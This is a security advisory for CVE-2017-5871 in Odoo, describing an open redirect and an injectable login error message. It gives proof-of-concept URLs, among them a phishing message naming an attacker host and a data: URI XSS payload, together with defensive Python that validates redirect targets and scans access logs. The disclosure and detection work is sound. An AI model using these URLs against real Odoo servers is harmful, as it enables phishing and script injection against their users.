Odoo is a well-known open source ERP software suite.

We found an open redirection vulnerability in the software, together with an arbitrary error message injection that is useful for phishing.

Arbitrary error message

On the login page (/web/login) and the database selection page (/web/database/selector), a URL parameter (error) is available to display an error message. It is used to inform users of any issue with the authentication process. Unfortunately, the content of this parameter is not restricted, so it can be tampered with to drive a social engineering attack. There is also a redirect parameter that is neither restricted to the current domain nor limited to the HTTP/HTTPS schemes, which allows an arbitrary redirect, or even an XSS through a data: URI, on the same pages.

CVE ID: CVE-2017-5871

Access Vector: remote

Security Risk: medium

Vulnerability: CWE-601

CVSS Score (v3): 5.4

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Proof of Concept : malicious URL in error message

Access the following URLs with the error parameter set to the desired message:

Login page :

http://odoo.srv/web/login?error=Please%20login%20to%20http://attacker.odoo.srv/%20to%20recover%20your%20account

Database selector page :

http://odoo.srv/web/database/selector?error=Please%20login%20to%20http://attacker.odoo.srv/%20to%20recover%20your%20account

This parameter is not vulnerable to XSS, so on its own it is not a critical issue. However, it is useful in a phishing scenario: the forged message is displayed inside the legitimate login page.

Proof of Concept : malicious redirection

Access the following URL with the redirect parameter set to the (URL-encoded) target URL. This logout endpoint also affects version 9:

http://localhost:8069/web/session/logout?redirect=https%3a%2f%2fsysdream.com%2f

The same applies to the database redirection endpoint:

http://localhost:8069/web/dbredirect?redirect=https%3a%2f%2fsysdream.com%2f

Since the scheme of the target is not checked either, we can also turn this redirection into an XSS on the login page by injecting a data: URI. The base64 part of the payload below decodes to <script>alert("Hello");</script>:

http://localhost:8069/web/login?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=

Note that current browsers refuse top-level navigations to data: URIs, so this XSS variant depends on the browser in use; the open redirect itself is not affected by that restriction.
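As an added example (not Odoo's code and not part of the Sysdream advisory), the following Python shows the two practical sides of the issue described in the "Arbitrary error message" section and exercised by the proofs of concept above: a redirect-target check of the kind needed to close the flaw (the redirect parameter must stay on the current host and on http/https, which also refuses data: and javascript: targets), and a small triage over access-log lines that flags off-site or non-HTTP redirect targets and URLs embedded in the error parameter. The own_host values, the /web fallback and the log lines are assumptions made for the example; the log lines are constructed from the PoC URLs above.

```python
"""Added example (not Odoo's code): reject off-site / non-HTTP redirect targets,
and triage access-log lines for the CVE-2017-5871 patterns shown above.
Host names, the /web fallback and the log lines are assumptions for the demo."""
import base64
import re
from urllib.parse import unquote, unquote_plus, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_safe_redirect(target: str, own_host: str) -> bool:
    """True only if `target` is a local path or an http(s) URL on `own_host`.

    `own_host` must match the Host header exactly (port included, e.g.
    "localhost:8069"). Rejected: other hosts (https://sysdream.com/), non-HTTP
    schemes such as data: or javascript:, protocol-relative targets (//evil,
    ///evil), backslashes (browsers read them as slashes: /\\evil, http:\\evil),
    scheme-only targets (https:evil) and control characters or whitespace that
    could alter the Location header.
    """
    if not target or re.search(r"[\x00-\x20\x7f]", target):
        return False
    if "\\" in target or target.startswith("//"):
        return False
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        if parts.scheme.lower() not in ALLOWED_SCHEMES:
            return False
        if parts.netloc.lower() != own_host.lower():
            return False
    return True


def safe_redirect(target: str, own_host: str, fallback: str = "/web") -> str:
    """What a fixed handler should do: keep a safe target, otherwise fall back."""
    return target if is_safe_redirect(target, own_host) else fallback


def decode_data_uri(value: str) -> str:
    """Expose the HTML carried by a data: URI (base64 or percent-encoded)."""
    header, _, body = value.partition(",")
    if ";base64" in header:
        return base64.b64decode(body).decode("utf-8", "replace")
    return unquote(body)


def query_params(query: str) -> dict:
    """Split on '&' only: parse_qs() on older Pythons also splits on ';',
    which would cut a data:text/html;base64,... target in half."""
    params: dict = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote_plus(value))
    return params


# Common log format: client, identd, user, [time], "METHOD path proto", status
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3})')
URL_IN_ERROR = re.compile(r"(?i)(?:https?:)?//")  # an absolute URL inside the error text


def triage_log(lines, own_host: str):
    """Return (client, endpoint, parameter, decoded value) for every request whose
    redirect target would be refused by is_safe_redirect(), or whose error
    message smuggles a URL (the phishing variant)."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        params = query_params(url.query)
        for value in params.get("redirect", []):
            if not is_safe_redirect(value, own_host):
                findings.append((m.group("ip"), url.path, "redirect", value))
        for value in params.get("error", []):
            if URL_IN_ERROR.search(value):
                findings.append((m.group("ip"), url.path, "error", value))
    return findings


# Constructed sample log: the advisory's PoC URLs plus two benign requests.
SAMPLE_LOG = [
    '192.0.2.77 - - [21/Apr/2017:10:00:01 +0200] "GET /web/login?redirect=%2Fweb HTTP/1.1" 200 1234',
    '203.0.113.9 - - [21/Apr/2017:10:00:07 +0200] "GET /web/session/logout?redirect=https%3a%2f%2fsysdream.com%2f HTTP/1.1" 303 0',
    '198.51.100.4 - - [21/Apr/2017:10:00:12 +0200] "GET /web/login?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= HTTP/1.1" 200 1234',
    '198.51.100.4 - - [21/Apr/2017:10:00:20 +0200] "GET /web/database/selector?error=Please%20login%20to%20http://attacker.odoo.srv/%20to%20recover%20your%20account HTTP/1.1" 200 1234',
    '192.0.2.77 - - [21/Apr/2017:10:01:00 +0200] "GET /web/login?error=Wrong%20login%2Fpassword HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    for client, endpoint, param, value in triage_log(SAMPLE_LOG, "localhost:8069"):
        print(f"{client} {endpoint} {param}={value!r}")
        if param == "redirect" and value.startswith("data:"):
            print("   decoded payload:", decode_data_uri(value))
    print("fixed handler would send", safe_redirect("https://sysdream.com/", "localhost:8069"))
```

The check deliberately compares the full authority (host and port) with the Host header rather than matching a domain suffix, since a suffix match is what lets http://odoo.srv@attacker.odoo.srv/ or attacker.odoo.srv through; the triage reuses the same function so that whatever the fix would refuse is exactly what the log review surfaces.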

Timeline (dd/mm/yyyy)

  • 06/01/2017 : Initial discovery by Romain E. Silva
  • 10/01/2017 : Further testing and exploitation techniques by Adel Nettar
  • 17/02/2017 : Reporting to Odoo
  • 28/02/2017 : Odoo acknowledges the report.
  • 29/03/2017 : Sysdream Labs requests an ETA.
  • 21/04/2017 : Warning of upcoming public disclosure.
  • 21/04/2017 : Odoo says that the bugfix is still under testing.
  • 28/04/2017 : Odoo provides a patch for the potential XSS vulnerability.
  • 23/06/2017 : Odoo publishes a security advisory https://github.com/odoo/odoo/issues/17800 with the list of commits that fix the vulnerabilities.
  • 29/09/2017 : Public disclosure on sysdream.com

Affected versions

  • Version 8.0 before d655824
  • Version 9 before 692f47d
  • Version 10 before eaa3682

Solution

(From the Odoo GitHub issue #17800)

The following list contains the revisions after which the vulnerability is corrected:

  • 8.0: d655824
  • 9.0: 692f47d
  • 10.0: eaa3682
  • 10.0-ent and 9.0-ent (Enterprise): see 9.0 and 10.0.

Credits

  • Romain E Silva, Sysdream <r.esilva -at- sysdream -dot- com>
  • Adel Nettar, Sysdream <a.nettar -at- sysdream -dot- com>